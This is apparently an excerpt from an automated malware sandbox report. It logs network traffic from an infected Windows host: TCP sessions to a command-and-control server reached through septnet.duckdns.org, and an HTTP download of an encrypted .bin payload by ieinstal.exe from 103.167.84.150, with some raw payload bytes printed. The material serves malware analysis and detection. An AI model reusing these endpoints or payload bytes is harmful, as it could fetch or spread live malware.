                          Nov 25, 2021 11:28:30.169509888 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169516087 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169523001 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169523954 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.169723988 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.169862986 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.169872046 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.171226025 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.171235085 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.171322107 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.171395063 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.171452999 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.171459913 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.171596050 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.171766043 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.222783089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.222791910 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.222887993 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.223011017 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.223017931 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.223028898 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.223036051 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.223187923 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.223391056 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.274343967 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.274605989 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.275842905 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.276031017 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.276057005 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.276204109 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.276212931 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.276309013 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.276316881 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.276485920 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.276655912 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.347364902 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347474098 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347482920 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347609997 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347618103 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347625017 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.347687006 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.347832918 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.347860098 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.348032951 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.348165035 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.399326086 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399566889 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.399590969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399800062 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.399828911 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399837971 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399945974 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.399950027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399960995 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.399967909 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.400063992 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.400145054 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.400316000 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.447590113 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.447895050 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.451441050 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.451554060 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.451683044 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.451698065 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.451812983 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.451901913 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.451930046 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.451937914 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.452058077 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.452205896 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.505840063 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.506059885 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.506108999 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.506230116 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.506340027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.506398916 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.506510019 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.506568909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.506625891 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.506736994 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.506876945 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.507046938 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.563079119 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563087940 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563189983 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563198090 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563205004 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563210964 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563218117 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.563225031 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.563430071 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.563596010 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.615158081 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.615329981 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.616544008 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.616715908 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.621819973 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.621928930 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.621937990 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.622034073 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.622041941 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.622066975 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.622075081 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.622081995 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.622087955 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.622210026 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.622220039 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.622349977 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.622512102 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.668998957 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.669229031 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.678668976 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.678777933 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.678786039 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.678911924 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.678966045 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.714075089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.730108023 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.779829025 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.985610962 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.032855988 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.132246971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.132455111 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.132474899 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.132524014 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.194758892 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194869041 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194876909 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194884062 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194890022 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194896936 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.194977999 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.195122004 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.247096062 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247253895 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247262955 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247359037 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.247376919 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247385025 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247390985 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247396946 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247528076 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.247698069 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.247742891 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.247961044 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.248167992 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.334613085 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.334816933 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.338653088 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.338768005 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.338777065 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.338937998 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.339076996 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.339186907 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.339306116 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.339468956 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.339608908 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.373775959 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.374067068 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.386171103 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.386375904 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.390328884 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.390337944 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.390542030 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.390564919 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.390741110 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.390881062 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.394570112 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.395153999 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.425297976 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.425565004 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.467654943 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.467664003 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.467746019 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.467755079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.467838049 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.467978954 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.467992067 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.476948977 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.477190971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.525623083 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.525634050 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.525655985 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.525664091 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.525855064 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.526000977 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.528847933 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.529032946 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.607455969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607465029 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607564926 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607573986 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607579947 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607585907 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607593060 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.607719898 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.607861042 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.659863949 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.659876108 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.659964085 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.659975052 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.659984112 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.660012960 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.660182953 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.660352945 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.667602062 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.667753935 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.667922974 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.732296944 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732474089 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.732589960 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732603073 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732724905 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732733011 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732816935 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732825041 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.732896090 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.733040094 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.784576893 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.784774065 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.784843922 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.784941912 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.784976006 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.784982920 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.784993887 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:31.785121918 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.785130024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.785267115 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.836633921 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:31.856136084 CET4981080192.168.11.20103.167.84.150
                          Nov 25, 2021 11:28:31.895706892 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:35.594556093 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:28:47.529328108 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:29:10.296793938 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:29:10.297719955 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:29:10.403040886 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:29:11.383416891 CET4980580192.168.11.20103.167.84.150

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 25, 2021 11:26:40.206996918 CET5129953192.168.11.201.1.1.1
                          Nov 25, 2021 11:26:40.315538883 CET53512991.1.1.1192.168.11.20

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Nov 25, 2021 11:26:40.206996918 CET192.168.11.201.1.1.10x986Standard query (0)septnet.duckdns.orgA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Nov 25, 2021 11:26:40.315538883 CET1.1.1.1192.168.11.200x986No error (0)septnet.duckdns.org193.104.197.85A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • 103.167.84.150

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.11.2049805103.167.84.15080C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                          TimestampkBytes transferredDirectionData
                          Nov 25, 2021 11:26:34.720074892 CET28OUTGET /mconta/Host_DwUbTLydN243.bin HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: 103.167.84.150
                          Cache-Control: no-cache
                          Nov 25, 2021 11:26:35.009077072 CET29INHTTP/1.1 200 OK
                          Date: Thu, 25 Nov 2021 10:26:38 GMT
                          Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                          Last-Modified: Wed, 24 Nov 2021 18:27:10 GMT
                          ETag: "28240-5d18d018cabcd"
                          Accept-Ranges: bytes
                          Content-Length: 164416
                          Content-Type: application/octet-stream
                          Data Raw: 1a 28 20 db 91 2c bd f8 80 63 77 bc 30 a9 80 ac 09 32 33 ca 09 63 a2 54 21 de 48 da cf e2 f2 05 93 65 62 53 77 60 ea 6b 8a bf c6 af ac 70 3b 7d fe 4b 16 a3 4b e0 34 b2 cb c9 ff 2b 0c e3 8f 99 93 1a a8 2d 3f 62 4f d3 db 42 33 01 54 fe 12 ed 99 19 5c 08 5c 2b b2 9e 0b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 0c e8 96 46 6d d3 4b 13 5e a5 79 8e ab 83 e9 46 1f 84 e7 1c be c4 50 68 42 33 3c 1a 90 40 49 44 e6 0d 41 12 32 9b e2 7a 43 41 a3 29 37 39 d9 33 df 5a 12 53 22 a7 36 e1 01 a3 77 83 06 5d 65 58 11 a7 dd 24 67 67 03 c5 f1 8f a9 f7 0f 73 a9 9b b9 06 69 8a db 23 2f a8 1e 50 b2 a7 fb 3f 7f 61 89 1b 1d 85 94 2d b8 59 af c5 de 61 e5 e7 2d de 4c 44 d9 7e 0a f5 10 a9 75 da d3 d7 f3 de e7 04 50 74 a7 f9 ee 4f 41 a8 47 7c dd 52 66 f9 61 e9 e3 e3 2d eb 11 5a 17 25 7c 83 b1 f5 72 05 7c f2 3c bb 86 a6 e0 5e 44 32 55 90 d5 8d 20 38 c5 b7 be f2 ff db 5f b0 0b dc 4e c4 0e b4 12 53 3d 8b 8b c5 59 c9 fb 41 97 c5 07 bf c7 1f c5 74 0c 8e 07 f4 d3 e1 01 3a 78 d3 73 cd 25 fa 1c 05 08 75 0c 25 41 2e cd d6 8c 72 63 30 cb b6 51 d4 1e b9 d4 7c 4d d4 03 dc fe fb a3 4f 63 d4 46 72 eb 63 8a 91 25 06 c3 cf a2 12 77 4f 3b 6d 60 42 1c 30 2f 0d 44 75 69 fd 29 2d 4c 74 63 13 4d f6 db 18 f0 a7 db 88 31 85 da 9e 45 c5 9b 8a 51 87 30 19 cc c5 18 95 7c 1d 8e 26 e3 e0 41 a8 25 57 ca c7 1b 87 d1 f9 ba e7 dc 76 11 2c 12 4d ce d9 52 59 6f 7e 58 c3 e5 41 b0 bc 0b 5e 3d ba e6 17 11 12 a4 22 e3 46 96 69 1e 79 70 ba 76 5c b5 38 46 c4 5c ff 92 d6 94 80 2b 8d 08 92 b8 1e 33 0b 30 d8 a2 36 00 c1 aa 4e a0 c3 e1 2d 28 62 0b 24 39 31 b8 54 8e 1f 4d 31 38 9a 7f 01 2f 13 28 15 86 3f 54 70 1e 9c 0f db aa 3b 65 e0 55 13 f0 85 31 6b 3a b6 df 6c 30 03 ed 44 ab 8f 6b ff 0a 5a ac 54 3d 2e 84 7b 53 bc 32 1b df 46 62 41 c4 c3 67 f1 65 88 28 0c 38 e8 4a 62 d5 38 97 a0 6d c7 f8 38 c0 69 42 8e f4 2c 6d a1 bb cf dc b4 cb bb 9f 66 b1 69 52 c4 5b 4b 7f fb 79 00 3d 03 f3 93 e7 d1 32 1a 8c d2 8c 8a 81 62 11 6b 97 9c 4b 1b 05 b4 0b ae 33 eb a3 3f 85 59 b1 fc 6a 4a 3b 7e d9 c4 61 bf 55 bc ef c7 1d d2 f9 bc ce c4 13 50 98 4e d1 75 12 b9 f8 3a 28 47 9f 91 73 8b 6b 14 b0 49 5f f6 59 db be d6 91 f3 48 2b 52 54 bb 9e 70 28 dc 1b 04 47 bd 6e 83 fb b9 cb bd a0 a6 8b 2d 6c 0b 37 bb 4f 27 5c 24 ff 94 85 a9 25 90 14 20 45 aa 82 fd 03 f0 38 e6 5d fb ff a0 5b 31 6f d8 c5 82 ee 1f 84 69 6c e4 e8 87 3b 18 bb 8c 49 01 4f 54 3c 72 28 b6 dd 05 b1 df e9 05 44 d0 0d 69 81 43 d5 45 50 88 fb b9 75 90 a8 57 c7 ac 6c 42 b1 22 9b 43 7e dc 9a e9 c2 3a ff 32 76 9d 2e f3 19 d0 68 ad 37 1b 9c 31 43 a9 31 66 fe e1 8f 20 e3 36 b4 35 b7 a0 7b 43 6f f1 56 9a d9 bf 06 39 9e 09 9e c9 b8 90 09 4b 0e e2 16 3e 51 ab e2 24 ca b7 e6 e4 f0 4a d7 3a d8 3e ff c6 2a d6 ee 12 26 25 9d d5 5a 7e e5 02 cb 69 24 c5 c5 73 43 f2 a3 9b 3b 43 a0 18 69 b3 e4 ec d0 2b 7e 99 90 2b 77 66 54 60 e7 98 49 d2 39 1b f1 84 2b d8 6f 59 54 83 38 8d 07 21 ed ea 2b 87 43 3a 50 6c 21 8a de 40 38 2d 3c 62 4f d3 df 42 33 01 ab 01 12 ed 21 19 5c 08 5c 2b b2 9e 4b 1b 51 d9 09 6a 58 1b 16 2c b8 c9 50 a6 87 32 4a 70 bb b6 0e 59 a0 88 f1 39 ff e8 ba b3 cf bb b0 2b 81 84 8c e8 96 46 63 cc f1 1d 5e 11 70 43 8a 3b e8 0a d2 a5 b3 74 d7 b7 70 18 30 5c 5b 68 f1 2d 69 27 87 63 2f 7d 46 bb 80 1f 63 33 d6 47 17 50 b7 13 9b
                          Data Ascii: ( ,cw023cT!HebSw`kp;}KK4+-?bOB3T\\+QjX,P2JpY9+FmK^yFPhB3<@IDA2zCA)793ZS"6w]eX$ggsi#/P?a-Ya-LD~uPtOAG|Rfa-Z%|r|<^D2U 8_NS=YAt:xs%u%A.rc0Q|MOcFrc%wO;m`B0/Dui)-LtcM1EQ0|&A%Wv,MRYo~XA^="Fiypv\8F\+306N-(b$91TM18/(?Tp;eU1k:l0DkZT=.{S2FbAge(8Jb8m8iB,mfiR[Ky=2bkK3?YjJ;~aUPNu:(GskI_YH+RTp(Gn-l7O'\$% E8][1oil;IOT<r(DiCEPuWlB"C~:2v.h71C1f 65{CoV9K>Q$J:>*&%Z~i$sC;Ci+~+wfT`I9+oYT8!+C:Pl!@8-<bOB3!\\+KQjX,P2JpY9+Fc^pC;tp0\[h-i'c/}Fc3GP
                          Nov 25, 2021 11:26:35.009140015 CET30INData Raw: 15 41 73 4f c8 52 84 2f ae 7a 89 22 5d 65 58 11 a7 dd 24 37 22 03 c5 bd d8 fd c6 92 89 8f d1 7e 03 2d a2 99 23 d0 57 01 af 7b a0 d4 9e 99 3a 89 f5 70 a9 94 55 7f 5d 8b 0d 3c 23 c8 2b 4e f2 4c 54 52 4b da 60 50 a9 b2 df a3 64 b1 ce e7 04 50 76 60
                          Data Ascii: AsOR/z"]eX$7"~-#W{:pU]<#+NLTRK`PdPv`:F|RMZ-j9XY&V~sD+J$m]1_Uh3fY|6\'g%q!a%Q>M+NcFGy"F6Idr/@Qk-Hxq
                          Nov 25, 2021 11:26:35.009188890 CET32INData Raw: b1 37 50 e1 a8 ef b9 7f 5d 8d 3d 03 f3 e0 21 55 56 94 bc 92 a2 bf 23 87 41 85 97 9c a3 2d c3 30 2f 3e 30 eb a3 58 43 dd 95 0d 68 4a 3b 7e 1e c0 45 45 7c fe ef b9 5f 3a 7f 5d ff 04 b0 b6 d9 ee bc 16 12 30 10 13 24 ca 1b 95 bc 8b 6b 1a 77 0d 7b 86
                          Data Ascii: 7P]=!UV#A-0/>0XChJ;~EE|_:]0$kw{_l?0)=S@5]$m-p]r4kE;mn<KT<|UgAP<QG*C~]>2v=Y,;%B1 _kBot]\9
                          Nov 25, 2021 11:26:35.009236097 CET33INData Raw: b0 0f 56 a0 25 aa 7a 89 ca f6 b9 59 11 22 1d ad f1 2d 87 a9 b4 8e ae 77 32 0b 62 ca 2d 86 61 8e db 23 ac 6b fc 97 f8 80 e0 3a 7f 78 89 94 5b a1 98 92 fc 7d a7 ac de 61 c8 04 69 fa 48 53 d9 7e 0a 5c 0e 8d 9d 8c 9c d6 f3 43 61 00 52 76 a7 3e ae 6b
                          Data Ascii: V%zY"-w2b-a#k:x[}aiHS~\CaRv>kQD|&i-,UN"||cn_d 9\8{^-BO\?](#H(B&Ehc%=X!t%AQ0X<ksGr)wO;$f7/DuBucX$]
